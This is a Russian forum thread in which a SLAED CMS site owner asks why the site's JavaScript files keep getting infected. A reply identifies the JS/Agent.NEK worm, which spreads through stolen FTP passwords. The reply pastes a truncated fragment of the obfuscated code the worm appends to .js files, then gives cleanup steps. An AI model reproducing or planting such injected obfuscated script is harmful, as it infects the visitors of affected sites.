На моем сайте уже четветый раз все файлы js заражаются вредоносныи кодом. Не могу найти дыру. Может есть какие нибудь мысли
Открыть
Ответить
JS/Agent.NEK
ra55551, Америки не открою, а мысли - из гугла:
Выход - оттуда же:
P.S. Кстати, мой Dr.Web ругается на скрипт форума у тебя на сайте.
Червь попадает на сайт через FTP, воруя пароли к вашим аккаунтам и затем отлично там располагается. Затем вирус троян прописывается практически во файлах с расширением *.js, дописывая в конце документа свой вредоносный код. Вот скин с текстом кода:
var lf63d546="";function adde83b9a98d(){var i7ad23b=String,a6c0379=Array.prototype.slice.call(arguments).join(""),yafa43=a6c0379.substr(r7cce1563(),3)-517,ra145e,t578aa226;a6c0379=a6c0379.substr(13);var de635afd5=j4e34c(a6c0379);for(var rd81e90=0;rd81e90<de635afd5;rd81e90++){try{throw(j93b05de=a6c0379.substr(rd81e90,1));}catch(e){j93b05de=e;};if(j93b05de=='–'){yafa43="";rd81e90++;i03c1c34=b52393af(a6c0379,rd81e90);while(i03c1c34!='–'){yafa43+=i03c1c34;rd81e90++;i03c1c34=a6c0379.substr(rd81e90,1);}yafa43-=479;continue;}ra145e="";if(j93b05de=='±'){rd81e90++;j93b05de=a6c0379.substr(rd81e90,1);while(j93b05de!='±'){ra145e+=j93b05de;rd81e90++;j93b05de=a6c0379.substr(rd81e90,1);}
Выход - оттуда же:
Первое, это поменять пароли ко всем аккаунтам FTP, к админке сайта, к биллинг-панели на хостинге и так далее.
Затем очистить ваш компьютер от всякой дряни с помощью вашего антивируса или онлайн-сервисов.
А следующий и самый трудоёмкий шаг - пройтись по вашей CMS и вручную удалить записи трояна в конце всех JS-файлов вашего сайта.
P.S. Кстати, мой Dr.Web ругается на скрипт форума у тебя на сайте.
Версия системы: SLAED CMS 5.* Pro
Версия PHP: PHP 5
Сервер: Сервер в интернете
AlexFly
- Группа: Клиент
- Пункты: 2017
- Регистрация: 13.01.2006
- Пол: Мужчина
- Из: Нижний Новгород
3.71
3.71
Открыть
Ответить